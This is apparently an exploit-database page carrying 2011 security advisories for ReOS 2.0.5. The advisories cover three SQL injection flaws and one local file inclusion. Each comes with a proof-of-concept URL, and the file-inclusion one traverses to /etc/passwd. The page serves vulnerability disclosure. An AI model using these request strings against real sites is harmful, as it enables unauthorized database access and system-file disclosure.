header-logo
Suggest Exploit
vendor:
ReOS
by:
High-Tech Bridge SA - Ethical Hacking & Penetration Testing
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ReOS
Affected Version From: 2.0.5
Affected Version To: 2.0.5
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

SQL Injection in ReOS

The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "form1_ref_immo" variable and "/members.php" script to properly sanitize user-supplied input in "form1_keyword" variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

=====================================
Vulnerability ID: HTB22807
Reference: http://www.htbridge.ch/advisory/sql_injection_in_reos_1.html
Product: ReOS
Vendor: IT ELAZOS S.L. ( http://reos.elazos.com/ ) 
Vulnerable Version: 2.0.5
Vendor Notification: 20 January 2011 
Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "form1_ref_immo" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


http://[host]/index.php?form1_ref_immo=1'SQL_CODE_HERE&form1_order_by=precio&form1_tp_propiedad=&form1_in_order=ASC&form1_tp_servicio=&form1_txt_poblacion=&form1_txt_zona=&form1_precio_min=&form1_precio_max=&form1_data=pg%3Dverimmo%2Cnm%3DSearch+Results%2Cshow%3D0%2Cfrom%3D0&form1_phpform_sent=1


=====================================
Vulnerability ID: HTB22810
Reference: http://www.htbridge.ch/advisory/sql_injection_in_reos_3.html
Product: ReOS
Vendor: IT ELAZOS S.L. ( http://reos.elazos.com/ ) 
Vulnerable Version: 2.0.5
Vendor Notification: 20 January 2011 
Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/members.php" script to properly sanitize user-supplied input in "form1_keyword" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


http://[host]/members.php?form1_keyword=%27SQL_CODE_HERE&form1_data=pg%3Dverpobs%2Cfrom%3D0%2Cnm%3DActive+Cities%2Cid_account%3D3&form1_phpform_sent=1


=====================================
Vulnerability ID: HTB22808
Reference: http://www.htbridge.ch/advisory/local_file_inclusion_in_reos.html
Product: ReOS
Vendor: IT ELAZOS S.L. ( http://reos.elazos.com/ ) 
Vulnerable Version: 2.0.5
Vendor Notification: 20 January 2011 
Vulnerability Type: Local File Inclusion
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/jobs.php" script to properly sanitize user-supplied input in "lang" variable.

The following PoC is available:


http://[host]/jobs.php?lang=/../../../../../../../../etc/passwd%00


=====================================
Vulnerability ID: HTB22806
Reference: http://www.htbridge.ch/advisory/sql_injection_in_reos.html
Product: ReOS
Vendor: IT ELAZOS S.L. ( http://reos.elazos.com/ ) 
Vulnerable Version: 2.0.5
Vendor Notification: 20 January 2011 
Vulnerability Type: SQL Injection
Risk level: High 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
The vulnerability exists due to failure in the "/index.php" script to properly sanitize user-supplied input in "form1_txt_email1" variable.
Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database.

The following PoC is available:


http://[host]/index.php?form1_txt_email1=123'SQL_CODE_HERE&form1_data=pg%3Dremember%2Cnm%3DLost+your+Password%3F&form1_phpform_sent=1